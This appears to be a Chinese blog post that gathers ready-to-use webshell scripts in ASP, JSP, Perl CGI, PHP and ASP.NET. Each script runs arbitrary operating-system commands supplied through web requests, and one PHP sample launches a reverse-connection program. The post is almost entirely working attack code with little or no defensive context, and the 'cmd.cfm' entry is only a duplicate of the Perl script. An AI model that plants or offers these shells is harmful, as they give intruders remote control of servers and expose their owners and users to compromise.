webshell下执行命令脚本汇集

Posted 2020-06-24 err0">tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了webshell下执行命令脚本汇集相关的知识，希望对你有一定的参考价值。

cmd1.asp

<object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if %> <form method="post"> <input type=text name="cmdx" size=60 value="C:\Documents and Settings\All Users\cmd.exe"><br> <input type=text name="cmd" size=60 value="<%=request.form("cmd")%>"><br> <input type=submit value="cmd命令"></form> <textarea readonly cols=80 rows=20> <%On Error Resume Next if request.form("cmdx")="C:\Documents and Settings\All Users\cmd.exe" then response.write shell.exec("cmd.exe /c"&request.form("cmd")).stdout.readall end if response.write shell.exec(request.form("cmdx")&" /c"&request.form("cmd")).stdout.readall %> </textarea>

cmd2.asp

<center><%response.write "<font size=4 color=red>shellapplication执行命令无回显</font>" %> <BR>程序所在的物理路径： <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> </center> <html><title>shellapplication执行命令 by kyo327 </title> <body><br/><center> <form action="<%= Request.ServerVariables("URL") %>" method="POST"> <br>程序路径：<br/> <input type=text name=text1 size=60 value="C:\Documents and Settings\All Users\Documents\cmd.exe"> <br/> 参数：<br/><input type=text name=text2 size=60 value="<%=canshu%>"><br/> <input type=submit name=makelove value=运行> </form> </center></body> </html> <% appnames = Request.Form("text1") canshu = Request.Form("text2") if appnames<>"" then set kyoshell=createobject("shell.application") kyoshell.ShellExecute appnames,canshu,"","open",0 response.write "<center>执行成功！</center>" end if %>

cmd.jsp

<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %>

cmd.cgi

#!/usr/bin/perl read(STDIN,$POST,$ENV{‘CONTENT_LENGTH‘}); ($key,$command)=split(/=/,$POST); $command=~s/%([a-fA-f0-9][a-fA-f0-9])/pack("C",hex($1))/eg; $command=~s/\+/ /; $output=system "$command>a.txt"; $output=~s/\n/\<br\>/; print "Content-Type: text/html\n\n"; print <<EOF; <form action="" method=POST> <input type=text size=40 name=command value=""><br> <input type=submit value=ok> </form> EOF open(OUTPUT,"a.txt")||die "cannot open $!"; @output=<OUTPUT>; print <<EOF; <textarea name="textfield" cols="80" rows="60">@output</textarea> EOF close OUTPUT; unlink ("a.txt"); exit;

cmd.cfm

#!/usr/bin/perl read(STDIN,$POST,$ENV{‘CONTENT_LENGTH‘}); ($key,$command)=split(/=/,$POST); $command=~s/%([a-fA-f0-9][a-fA-f0-9])/pack("C",hex($1))/eg; $command=~s/\+/ /; $output=system "$command>a.txt"; $output=~s/\n/\<br\>/; print "Content-Type: text/html\n\n"; print <<EOF; <form action="" method=POST> <input type=text size=40 name=command value=""><br> <input type=submit value=ok> </form> EOF open(OUTPUT,"a.txt")||die "cannot open $!"; @output=<OUTPUT>; print <<EOF; <textarea name="textfield" cols="80" rows="60">@output</textarea> EOF close OUTPUT; unlink ("a.txt"); exit;

cmd1.php

<?php if (key($_GET)=="system") { system($_GET[‘system‘]); } elseif (key($_GET)=="passthru") { passthru($_GET[‘passthru‘]); } elseif (key($_GET)=="exec") { $result = exec($_GET[‘exec‘]); echo $result; } elseif (key($_GET)=="shell_exec") { $result=shell_exec($_GET[‘shell_exec‘]); echo $result; } elseif (key($_GET)=="popen") { $pp = popen($_GET[‘popen‘], ‘r‘); $read = fread($pp, 2096); echo $read; pclose($pp); } elseif (key($_GET)=="wscript") { $wsh = new COM(‘WScript.shell‘) or die("PHP Create COM wscript.shell failed"); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET[‘wscript‘].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; } elseif(key($_GET)=="proc_open"){ $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open("C:\\Docume~1\\alluse~1\\Documents\\cmd.exe", $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], "".$_GET[‘proc_open‘]."\r\n"); fwrite($pipes[0], "exit\r\n"); fclose($pipes[0]); while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); while (!feof($pipes[2])) { echo fgets($pipes[2], 1024); } fclose($pipes[2]); proc_close($process); }} ?>

cmd2.php

<?php $wsh = new COM(‘Shell.Application‘) or die("Shell.Application"); $exec = $wsh->open("C:\\Docume~1\\alluse~1\\Documents\\fanlian.exe"); //没有回显，多了个fanlian进程，可以直接执行一个反向连接程序反弹回来 ?>

cmd1.aspx

<%@ Page Language="c#" validateRequest = "false" aspcompat = "true" %> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="Head1" runat="server"> <title>cmdshell</title></head> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <script language="C#" runat="server"> void Button_Click1(object sender, EventArgs e) { try { Process shell = new Process(); shell.StartInfo.FileName = PathTextBox.Text; shell.StartInfo.Arguments = ShellTextBox.Text; shell.StartInfo.UseShellExecute = false; shell.StartInfo.RedirectStandardInput = true; shell.StartInfo.RedirectStandardOutput = true; shell.StartInfo.RedirectStandardError = true; shell.Start(); string str1 = shell.StandardOutput.ReadToEnd(); str1 = str1.Replace("<", "<"); str1 = str1.Replace(">", ">"); myLabel.Text = "<hr><pre>" + str1 + "</pre>"; } catch (Exception Error) { Bin_Error(Error.Message); } } </script> <body> <center><font size=5 color=red>asp.net命令执行 by kyo</font><br /></center> <form id="form1" runat="server"><div style="text-align: center"> <asp:Panel ID="CmdPanel" runat="server" Height="50px" Width="800px"><hr /> 程序路径 :<asp:TextBox ID="PathTextBox" runat="server" Width="395px">C:\Documents and Settings\All Users\Documents\cmd.exe</asp:TextBox><br /> 命令参数 :<asp:TextBox ID="ShellTextBox" runat="server" Width="395px">/c ver</asp:TextBox><br /> <asp:Button ID="RunButton" runat="server" OnClick="Button_Click1" Text="运行" /></div> <div style="text-align: left"> <asp:Label ID="myLabel" runat="server" EnableViewState="False"></asp:Label></div> <hr /></asp:Panel></form></body> </html>

cmd2.aspx

<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" Debug="true"%> <script runat="server"> sub run(Src As Object, E As EventArgs) Dim StrResult As String Dim shell As Object shell = Server.CreateObject("WScript.Shell") StrResult = shell.exec( path.Text & " /c " & box.Text ).stdout.readall StrResult = Replace(StrResult , "<","<") StrResult = Replace(StrResult , ">",">") ResultLabel.Text = "<pre>" & StrResult & "</pre>" end sub </script> <html><head></head><body> <form runat="server"> 程序路径:<asp:TextBox ID="path" Width="500" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" /> <br>命令参数:<asp:TextBox ID="box" Width="200" runat="server" /> <asp:Button ID="Button" Text="Run" OnClick="run" runat="server" /><br> <asp:Label ID="ResultLabel" runat="server" /> </form></body></html>

cmd3.aspx

 <%@ Page Language="VB" validateRequest = "false" aspcompat = "true" %> <script runat="server"> sub run(Src As Object, E As EventArgs) Dim appName As String Dim appArgs As String Dim love As Object love = Server.CreateObject("Shell.Application") appName = appnames.Text appArgs = canshu.Text love.ShellExecute(appName, appArgs, "", "open", 0) end sub </script><html> <head><title>shellapplication For ASP.NET By kyo327</title></head> <body><form id="Form1" runat="server"> <center><font color=red size=4>利用shell.application执行命令for asp.net</font><br /> <br>程序路径名:<br /> <asp:TextBox ID="appnames" Width="400" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" /> <br>参数:<br /> <asp:TextBox ID="canshu" Width="400" runat="server" /> <br /><br /> <asp:Button ID="Button" Text="运行" OnClick="run" runat="server" /><br> </form></center></body></html>

以上是关于webshell下执行命令脚本汇集的主要内容，如果未能解决你的问题，请参考以下文章

神经网络检测webshell

技术干货 | Docker 容器逃逸案例汇集

webshell

按键精灵-常用脚本命令汇集

文件上传漏洞

关于PHP中的webshell